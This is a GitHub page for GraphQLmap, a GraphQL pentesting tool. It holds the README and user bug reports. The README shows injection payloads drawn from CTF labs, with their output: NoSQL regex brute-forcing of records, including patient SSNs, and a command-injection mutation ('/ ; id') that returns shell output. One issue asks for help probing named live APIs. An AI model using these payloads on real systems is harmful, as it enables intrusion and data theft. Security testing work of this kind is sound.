swisskyrepo / graphqlmap Goto Github PK

GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. - Do not use for illegal testing ;)

License: MIT License

Python 100.00%

graphql sql-injection nosql-injection graphql-injection fuzz pentest ctf capture-the-flag hacktoberfest

graphqlmap's Introduction

GraphQLmap

GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.

Install
Features and examples

I ❤️ pull requests, feel free to improve this script :)

You can also contribute with a 🍻 IRL or using Github Sponsoring button.

Install

$ git clone https://github.com/swisskyrepo/GraphQLmap
$ python setup.py install
$ graphqlmap                                                              
   _____                 _      ____  _                            
  / ____|               | |    / __ \| |                           
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __  
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \ 
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ 
                  | |                                       | |    
                  |_|                                       |_|    
                                         Author:Swissky Version:1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]] [--json [USE_JSON]] [--proxy [PROXY]]

optional arguments:
  -h, --help           show this help message and exit
  -u URL               URL to query : example.com/graphql?query={}
  -v [VERBOSITY]       Enable verbosity
  --method [METHOD]    HTTP Method to use interact with /graphql endpoint
  --headers [HEADERS]  HTTP Headers sent to /graphql endpoint
  --json [USE_JSON]    Use JSON encoding, implies POST
  --proxy [PROXY]      HTTP proxy to log requests

Development setup

python -m venv .venv
source .venv/bin/activate
pip install --editable .
pip install -r requirements.txt
./bin/graphqlmap -u http://127.0.0.1:5013/graphql

Features and examples

⚠️ Examples are based on several CTF challenges from HIP2019.

Connect to a graphql endpoint

# Connect using POST and providing an authentication token
graphqlmap -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'

# Pass request through Burp Proxy
graphqlmap -u "http://172.17.0.1:5013/graphql" --proxy http://127.0.0.1:8080

Dump a GraphQL schema

Use dump_new to dump the GraphQL schema, this function will automatically populate the "autocomplete" with the found fields.
🎥 Live Example

GraphQLmap > dump_new                     
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)                   
                                                                                               
Query                                          
        doctor[]: email (String!),                                                             
        doctors[Doctor]:                                                                       
        patients[Patient]:                                                                     
        patient[]: id (ID!),                   
        allrendezvous[Rendezvous]:                                                             
        rendezvous[]: id (ID!),                                                                
Doctor                                         
        id[ID]:                                                                                
        firstName[String]:                     
        lastName[String]:                                                                      
        specialty[String]:                     
        patients[None]: 
        rendezvous[None]: 
        email[String]: 
        password[String]: 
[...]

Interact with a GraphQL endpoint

Write a GraphQL request and execute it.

GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
{
    "data": {
        "doctors": [
            {
                "firstName": "Admin",
                "id": "5d089c51dcab2d0032fdd08d",
                "lastName": "Admin"
            }
        ]
    }
}

It also works with mutations, they must be written in a single line.

# ./bin/graphqlmap -u http://127.0.0.1:5013/graphql --proxy http://127.0.0.1:8080 --method POST
GraphQLmap > mutation { importPaste(host:"localhost", port:80, path:"/ ; id", scheme:"http"){ result }}
{
    "data": {
        "importPaste": {
            "result": "uid=1000(dvga) gid=1000(dvga) groups=1000(dvga)\n"
        {
    {
{

GraphQL field fuzzing

Use GRAPHQL_INCREMENT and GRAPHQL_CHARSET to fuzz a parameter.
🎥 Live Example

Example 1 - Bruteforce a character

GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}}   
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}}   
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}}     
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}

Example 2 - Iterate over a number

Use GRAPHQL_INCREMENT_ followed by a number.

GraphQLmap > { paste(pId: "GRAPHQL_INCREMENT_10") {id,title,content,public,userAgent} }
[+] Query: (45) { paste(pId: "0") {id,title,content,public,userAgent} }
[+] Query: (245) { paste(pId: "1") {id,title,content,public,userAgent} }
[+] Query: (371) { paste(pId: "2") {id,title,content,public,userAgent} }
[+] Query: (309) { paste(pId: "3") {id,title,content,public,userAgent} }
[+] Query: (311) { paste(pId: "4") {id,title,content,public,userAgent} }
[+] Query: (308) { paste(pId: "5") {id,title,content,public,userAgent} }
[+] Query: (375) { paste(pId: "6") {id,title,content,public,userAgent} }
[+] Query: (315) { paste(pId: "7") {id,title,content,public,userAgent} }
[+] Query: (336) { paste(pId: "8") {id,title,content,public,userAgent} }
[+] Query: (377) { paste(pId: "9") {id,title,content,public,userAgent} }

GraphQLmap > { paste(pId: "9") {id,title,content,public,userAgent} }
{ paste(pId: "9") {id,title,content,public,userAgent} }
{
    "data": {
        "paste": {
            "content": "I was excited to spend time with my wife without being interrupted by kids.",
            "id": "UGFzdGVPYmplY3Q6OQ==",
            "public": true,
            "title": "This is my first paste",
            "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
        }
    }
}

GraphQL Batching

GraphQL supports Request Batching. Batched requests are processed one after the other by GraphQL Use BATCHING_PLACEHOLDER before a query to send it multiple times inside a single request.

GraphQLmap > BATCHING_3 {__schema{ types{namea}}}
[+] Sending a batch of 3 queries
[+] Successfully received 3 outputs

GraphQLmap > BATCHING_2 {systemUpdate}
[+] Sending a batch of 2 queries
[+] Successfully received 2 outputs

NoSQLi injection

Use BLIND_PLACEHOLDER inside the query for the nosqli function.
🎥 Live Example

GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >

SQL injection

GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli

Practice

Damn Vulnerable GraphQL Application - @dolevf : docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dolevf/dvga

TODO

GraphQL Field Suggestions
Generate mutation query
Unit tests
Handle node

{
  user {
    edges {
      node {
        username
      }
    }
  }
}

graphqlmap's People

Contributors

Stargazers

Watchers

Forkers

materaj2 alonek1 marciopocebon bbhunter humblepoti sajibekanti jjsdub556 captainbarber99 ic3-cr3am mmg1 volgar1x affilares jimtje 5p3c7er healdb natecatx uuuunotfound kpli0rn securepo vonkrafft tomsec evcuq4hggjd74lhz pflashpunk 0dayctf mrbert0ni websecresearch naategh superf0sh rarecoil osonkr sireof iamsajidkhan elamaran619 ingramali waristea fuomag9 shreegowtham27 garanews root0xa3 imshaiknasir vquilondrino dmcgill50 laveptheone arukaminado michpice etx77 onsec-fr rakhithjk orangecms 5l1v3r1 aditya-chauhan17 heartway 3453-315h polling-repo-continua cyal1 affix safisec spoint42 th3cyb3rc0p peges gremwell yoooov dustinthegreat thamielis vineetkia 0x1bitcrack3r m1yh3m deepanjalkumar soufianetahiri saurabharch dekoder awasthi7 p0intsec n1f2c3 zer0dayh4ckz0r athul1337 zumb08 plasmak gkhan496 arthur4ires hartl3y94 alexloney binhan98 sec-js stjordanis fly8wo tamersp25 gprime31 1n1t6sh3ll chapmanjacobd bhishma14 chanpu9 fdlucifer adibdz anarcypher suryatmodulus psbachto madusec blackhatethicalhacking papadope-zz

graphqlmap's Issues

Doesn't Do The Instrospection (Errors Below)

┌──(root💀kali)-[/home/pawner/GraphQLmap]
└─# graphqlmap -u "https://graphql-demo.mead.io/" --proxy http://127.0.0.1:8080

/ | | | / __ | |
| | __ _ __ __ _ _ __ | | | | | | | _ __ ___ __ _ _ __
| | | | '/ _| '_ \| '_ \| | | | | | '_ _ \ / ` | ' \
| || | | | (| | |) | | | | |__| | || | | | | | (| | |) |
_|| _,| ./|| ||______|| || ||_,_| ./
| | | |
|| ||
Author: @pentest_swissky Version: 1.1
GraphQLmap > help
[+] dump_via_introspection : dump GraphQL schema (fragment+FullType)
[+] dump_via_fragment : dump GraphQL schema (IntrospectionQuery)
[+] nosqli : exploit a nosql injection inside a GraphQL query
[+] postgresqli : exploit a sql injection inside a GraphQL query
[+] mysqli : exploit a sql injection inside a GraphQL query
[+] mssqli : exploit a sql injection inside a GraphQL query
[+] exit : gracefully exit the application
GraphQLmap > dump_via_introspection
Traceback (most recent call last):
File "/usr/local/bin/graphqlmap", line 4, in
import('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 720, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 1570, in run_script
exec(script_code, namespace, namespace)
File "/usr/local/lib/python3.11/dist-packages/graphqlmap-0.0.1-py3.11.egg/EGG-INFO/scripts/graphqlmap", line 82, in
File "/usr/local/lib/python3.11/dist-packages/graphqlmap-0.0.1-py3.11.egg/EGG-INFO/scripts/graphqlmap", line 56, in init
File "/usr/local/lib/python3.11/dist-packages/graphqlmap-0.0.1-py3.11.egg/graphqlmap/attacks.py", line 32, in dump_schema
File "/usr/local/lib/python3.11/dist-packages/requests/models.py", line 900, in json
return complexjson.loads(self.text, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/simplejson/init.py", line 514, in loads
return _default_decoder.decode(s)
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/simplejson/decoder.py", line 386, in decode
obj, end = self.raw_decode(s)
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/simplejson/decoder.py", line 416, in raw_decode
return self.scan_once(s, idx=_w(s, idx).end())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
simplejson.errors.JSONDecodeError: Expecting value: line 2 column 3 (char 3)

full automation support

Besides a semi-automatic fuzzer, it would be really nice to have such a thing fully automated; I can imagine iterating over the obatained schema and stresstesting all the fields. I'll see what I can do. :)

KeyError: 'data"

Hey, what may be a reason of this kind of error ?
`bartek@ubuntu:~/Programs/GraphQLmap$ graphqlmap -u https://****.com/gateway?query={}

Traceback (most recent call last):
File "/usr/local/bin/graphqlmap", line 4, in
import('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
File "/home/bartek/.local/lib/python3.8/site-packages/pkg_resources/init.py", line 656, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/home/bartek/.local/lib/python3.8/site-packages/pkg_resources/init.py", line 1460, in run_script
exec(script_code, namespace, namespace)
File "/usr/local/lib/python3.8/dist-packages/graphqlmap-0.0.1-py3.8.egg/EGG-INFO/scripts/graphqlmap", line 81, in
File "/usr/local/lib/python3.8/dist-packages/graphqlmap-0.0.1-py3.8.egg/EGG-INFO/scripts/graphqlmap", line 56, in init
File "/usr/local/lib/python3.8/dist-packages/graphqlmap-0.0.1-py3.8.egg/graphqlmap/attacks.py", line 39, in dump_schema
KeyError: 'data'
`
I've got this error using dump_via_fragment and dump_via_introspection on two different endpoint. Configuration of the endpoints my be the reason ?

KeyError: 'data' on dump_via_fragment

GraphQLmap > dump_via_fragment
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

Traceback (most recent call last):
  File "/usr/local/bin/graphqlmap", line 4, in <module>
    __import__('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
  File "/usr/local/lib/python3.10/site-packages/pkg_resources/__init__.py", line 651, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/local/lib/python3.10/site-packages/pkg_resources/__init__.py", line 1455, in run_script
    exec(script_code, namespace, namespace)
  File "/usr/local/lib/python3.10/site-packages/graphqlmap-0.0.1-py3.10.egg/EGG-INFO/scripts/graphqlmap", line 81, in <module>
  File "/usr/local/lib/python3.10/site-packages/graphqlmap-0.0.1-py3.10.egg/EGG-INFO/scripts/graphqlmap", line 59, in __init__
  File "/usr/local/lib/python3.10/site-packages/graphqlmap-0.0.1-py3.10.egg/graphqlmap/attacks.py", line 39, in dump_schema
KeyError: 'data'

When i try dump_via_fragment option , then it throws above error and it exit

json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

GraphQLmap > dump_via_introspection
Traceback (most recent call last):
  File "/opt/homebrew/bin/graphqlmap", line 4, in <module>
    __import__('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
  File "/opt/homebrew/lib/python3.11/site-packages/pkg_resources/__init__.py", line 720, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/opt/homebrew/lib/python3.11/site-packages/pkg_resources/__init__.py", line 1570, in run_script
    exec(script_code, namespace, namespace)
  File "/opt/homebrew/lib/python3.11/site-packages/graphqlmap-0.0.1-py3.11.egg/EGG-INFO/scripts/graphqlmap", line 82, in <module>
  File "/opt/homebrew/lib/python3.11/site-packages/graphqlmap-0.0.1-py3.11.egg/EGG-INFO/scripts/graphqlmap", line 56, in __init__
  File "/opt/homebrew/lib/python3.11/site-packages/graphqlmap-0.0.1-py3.11.egg/graphqlmap/attacks.py", line 32, in dump_schema
  File "/opt/homebrew/lib/python3.11/site-packages/requests/models.py", line 900, in json
    self.content.decode(encoding), **kwargs
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Cellar/[email protected]/3.11.3/Frameworks/Python.framework/Versions/3.11/lib/python3.11/json/__init__.py", line 346, in loads
    return _default_decoder.decode(s)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Cellar/[email protected]/3.11.3/Frameworks/Python.framework/Versions/3.11/lib/python3.11/json/decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Cellar/[email protected]/3.11.3/Frameworks/Python.framework/Versions/3.11/lib/python3.11/json/decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

Impossible to Map These Introspection Disabled GQL APIs | [Apollo Servers]

If anyone could give me a hand -- running into this issue with pretty much every GraphQL enumeration / mapping tool or library for the following URLs. I'm not sure if there is some additional variable I'm missing that I need to be including or potentially a different URL? No clue.

https://api.hypedrop.com/graphql
[Apollo | Introspection Disabled]

https://api.hypeup.com/graphql
[Apollo | Introspection Disabled]

http://api.csgoroll.com/graphql
[Apollo | Introspection Disabled]

Seriously any and all help appreciated as this has been driving me insane!

Thank you so much for an amazing repo & tool. I hope to be able to utilize it!

Issue launching GraphQLmap.py - import module not found

Previously it was working fine however, I had to reinstall WSL and try to install GraphQLmap again. When I attempted to, it threw an error once I had extracted the repo and attempted to run the binary from the bin folder provided. I am not sure but, the first time round, installing this was no issue at all.

For example:

Called from: ~/GraphQLmap/bin
Command: ./graphqlmap

Error:
Traceback (most recent call last):
File "/home/{$user}/GraphQLmap/bin/./graphqlmap", line 8, in
from graphqlmap.attacks import *
ModuleNotFoundError: No module named 'graphqlmap'

Apparently there is an outdated version of something, I have included the error message when attempting to launch setup.py with python3.

warnings.warn(
Traceback (most recent call last):
File "/home/og/GraphQLmap/setup.py", line 6, in
setuptools.setup(
File "/usr/lib/python3/dist-packages/setuptools/init.py", line 108, in setup
return distutils.core.setup(**attrs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/setuptools/_distutils/core.py", line 185, in setup
return run_commands(dist)
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/setuptools/_distutils/core.py", line 201, in run_commands
dist.run_commands()
File "/usr/lib/python3/dist-packages/setuptools/_distutils/dist.py", line 969, in run_commands
self.run_command(cmd)
File "/usr/lib/python3/dist-packages/setuptools/dist.py", line 1213, in run_command
super().run_command(command)
File "/usr/lib/python3/dist-packages/setuptools/_distutils/dist.py", line 988, in run_command
cmd_obj.run()
File "/usr/lib/python3/dist-packages/setuptools/command/install.py", line 74, in run
self.do_egg_install()
File "/usr/lib/python3/dist-packages/setuptools/command/install.py", line 117, in do_egg_install
cmd.ensure_finalized() # finalize before bdist_egg munges install cmd
^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/setuptools/_distutils/cmd.py", line 111, in ensure_finalized
self.finalize_options()
File "/usr/lib/python3/dist-packages/setuptools/command/easy_install.py", line 335, in finalize_options
self.local_index = Environment(self.shadow_path + sys.path)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 1044, in init
self.scan(search_path)
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 1077, in scan
self.add(dist)
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 1096, in add
dists.sort(key=operator.attrgetter('hashcmp'), reverse=True)
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 2631, in hashcmp
self.parsed_version,
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 2679, in parsed_version
self._parsed_version = parse_version(self.version)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/pkg_resources/_vendor/packaging/version.py", line 266, in init
raise InvalidVersion(f"Invalid version: '{version}'")
pkg_resources.extern.packaging.version.InvalidVersion: Invalid version: '1.4-py1'
(package: adns)

I would like to use the tool so any advice on getting it to work is useful. I have tried uninstalling, moving the file to another DIR and also moving to bin. As mentioned, it has worked fine before but, I had an issue which forced me to restart my WSL so I am not sure if that issue is connected.

UnicodeEncodeError: 'latin-1' codec can't encode character

This happens after running dump new and looks like it has to do with cookies or response body containing non unicode characters. So somehow setting UTF-8 encoding might solve the issue. I tried to append r.encoding = 'utf-8 after calls to requests in util.py but that didn't help. Here's the traceback:

Traceback (most recent call last):
  File "/usr/local/bin/graphqlmap", line 4, in <module>
    __import__('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
  File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 656, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 1460, in run_script
    exec(script_code, namespace, namespace)
  File "/usr/local/lib/python3.10/dist-packages/graphqlmap-0.0.1-py3.10.egg/EGG-INFO/scripts/graphqlmap", line 81, in <module>
  File "/usr/local/lib/python3.10/dist-packages/graphqlmap-0.0.1-py3.10.egg/EGG-INFO/scripts/graphqlmap", line 74, in __init__
  File "/usr/local/lib/python3.10/dist-packages/graphqlmap-0.0.1-py3.10.egg/graphqlmap/attacks.py", line 146, in exec_advanced
  File "/usr/local/lib/python3.10/dist-packages/graphqlmap-0.0.1-py3.10.egg/graphqlmap/attacks.py", line 88, in exec_graphql
  File "/usr/local/lib/python3.10/dist-packages/graphqlmap-0.0.1-py3.10.egg/graphqlmap/utils.py", line 33, in requester
  File "/usr/lib/python3/dist-packages/requests/api.py", line 119, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
    resp = conn.urlopen(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, in urlopen
    httplib_response = self._make_request(
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 394, in _make_request
    conn.request(method, url, **httplib_request_kw)
  File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 234, in request
    super(HTTPConnection, self).request(method, url, body=body, headers=headers)
  File "/usr/lib/python3.10/http/client.py", line 1282, in request
    self._send_request(method, url, body, headers, encode_chunked)
  File "/usr/lib/python3.10/http/client.py", line 1323, in _send_request
    self.putheader(hdr, value)
  File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 219, in putheader
    _HTTPConnection.putheader(self, header, *values)
  File "/usr/lib/python3.10/http/client.py", line 1255, in putheader
    values[i] = one_value.encode('latin-1')
UnicodeEncodeError: 'latin-1' codec can't encode character '\u2026' in position 512: ordinal not in range(256)

cant solve

Traceback (most recent call last):
File "/usr/local/bin/graphqlmap", line 4, in
import('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 666, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 1468, in run_script
script_code = compile(script_text, script_filename, 'exec')
File "/usr/local/lib/python2.7/dist-packages/graphqlmap-0.0.1-py2.7.egg/EGG-INFO/scripts/graphqlmap", line 32
print(" " * 30, end='')
^
SyntaxError: invalid syntax

[!] Expecting value: line 1 column 1 (char 0)

Headers ignored for GET requests

Please fix the issue within GET requests. There is ignored HEADERS argument.
Add to utils.py line 33 headers parameter:

Headers error "bearer"

Hi! When using authentication token as per your example of usage I get the error that the Bearer is not a valid argument. I tried with single and double quotes but I get the same error. Any idea what´s going on?

this is your example:

python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'

InsecureRequestWarning: Unverified HTTPS request is being made.

root@kali-murdockz:~/GraphQLmap# python3 graphqlmap.py -u "https://[target-site]/graphiql/?query={}"
   _____                 _      ____  _
  / ____|               | |    / __ \| |
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/
                  | |                                       | |
                  |_|                                       |_|
                              Author: @pentest_swissky Version: 1.0
GraphQLmap > dump
dump
/usr/local/lib/python3.7/dist-packages/urllib3/connectionpool.py:847: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)
[!] Expecting value: line 1 column 1 (char 0)
GraphQLmap >

TypeError: can only concatenate str (not "NoneType") to str

   _____                 _      ____  _
  / ____|               | |    / __ \| |
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/
                  | |                                       | |
                  |_|                                       |_|
                              Author: @pentest_swissky Version: 1.0
GraphQLmap > dump_via_fragment
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

00: Query
	getProperty[Property]: entity (String!), entity_id (String!), prop_keys (None!), Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/3.9/bin/graphqlmap", line 4, in <module>
    __import__('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
  File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/pkg_resources/__init__.py", line 651, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/pkg_resources/__init__.py", line 1455, in run_script
    exec(script_code, namespace, namespace)
  File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/graphqlmap-0.0.1-py3.9.egg/EGG-INFO/scripts/graphqlmap", line 81, in <module>
  File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/graphqlmap-0.0.1-py3.9.egg/EGG-INFO/scripts/graphqlmap", line 59, in __init__
  File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/graphqlmap-0.0.1-py3.9.egg/graphqlmap/attacks.py", line 74, in dump_schema
TypeError: can only concatenate str (not "NoneType") to str

Crash on unexpected input from server

got this crash:

$ python3 graphqlmap.py -u http://199.247.4.207:4000/
   _____                 _      ____  _                            
  / ____|               | |    / __ \| |                           
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __  
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \ 
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ 
                  | |                                       | |    
                  |_|                                       |_|    
                              Author: @pentest_swissky Version: 1.0 
GraphQLmap > dump_new
Traceback (most recent call last):
  File "graphqlmap.py", line 71, in <module>
    GraphQLmap(args)
  File "graphqlmap.py", line 47, in __init__
    dump_schema(self.url, self.method, 15)
  File "/home/capitol/project/GraphQLmap/attacks.py", line 36, in dump_schema
    schema = r.json()
  File "/usr/lib/python3/dist-packages/requests/models.py", line 897, in json
    return complexjson.loads(self.text, **kwargs)
  File "/usr/lib/python3/dist-packages/simplejson/__init__.py", line 518, in loads
    return _default_decoder.decode(s)
  File "/usr/lib/python3/dist-packages/simplejson/decoder.py", line 370, in decode
    obj, end = self.raw_decode(s)
  File "/usr/lib/python3/dist-packages/simplejson/decoder.py", line 400, in raw_decode
    return self.scan_once(s, idx=_w(s, idx).end())
simplejson.errors.JSONDecodeError: Expecting value: line 2 column 3 (char 3)

readline module is not available on Windows

your "import readline" does not work on Windows. I think this is the only library that keep graphqlmap from working cross-platform. Can we change "readline" to something else? which is available on Windows as well.

Support Other Graphql Query Formats

I have found alot of graphql servers take queries via post requests differently.

{ "query": "{}", "variables": {} }

This is the format that Shopify's graphql server supports. It has to be made as a post request to the /graphql endpoint. Would it be possible to support this query format?

distribution was not found and is required by the application

graphqlmap

Traceback (most recent call last):
  File "/usr/bin/graphqlmap", line 4, in <module>
    __import__('pkg_resources').run_script('graphqlmap==0.0.1', 'graphqlmap')
  File "/usr/local/lib/python3.9/dist-packages/pkg_resources/__init__.py", line 3260, in <module>
    def _initialize_master_working_set():
  File "/usr/local/lib/python3.9/dist-packages/pkg_resources/__init__.py", line 3234, in _call_aside
    f(*args, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/pkg_resources/__init__.py", line 3272, in _initialize_master_working_set
    working_set = WorkingSet._build_master()
  File "/usr/local/lib/python3.9/dist-packages/pkg_resources/__init__.py", line 581, in _build_master
    ws.require(__requires__)
  File "/usr/local/lib/python3.9/dist-packages/pkg_resources/__init__.py", line 909, in require
    needed = self.resolve(parse_requirements(requirements))
  File "/usr/local/lib/python3.9/dist-packages/pkg_resources/__init__.py", line 795, in resolve
    raise DistributionNotFound(req, requirers)
pkg_resources.DistributionNotFound: The 'graphqlmap==0.0.1' distribution was not found and is required by the application

POST vs GET

Do you have any plan in adding support for POST and other HTTPS verb ?

json error with method POST and headers

Hi,

When i tried using it with the parameters method=POST and headers like the example. i received this error-
AttributeError: 'NoneType' object has no attribute 'json'

Tnx

issue while opening graphqlmap.py

see the screenshot attached

KeyError: 'data'

Whenever I run graphQLmap. I get this error. Kindly help!

GraphQLmap > dump_new
============= [SCHEMA] ===============
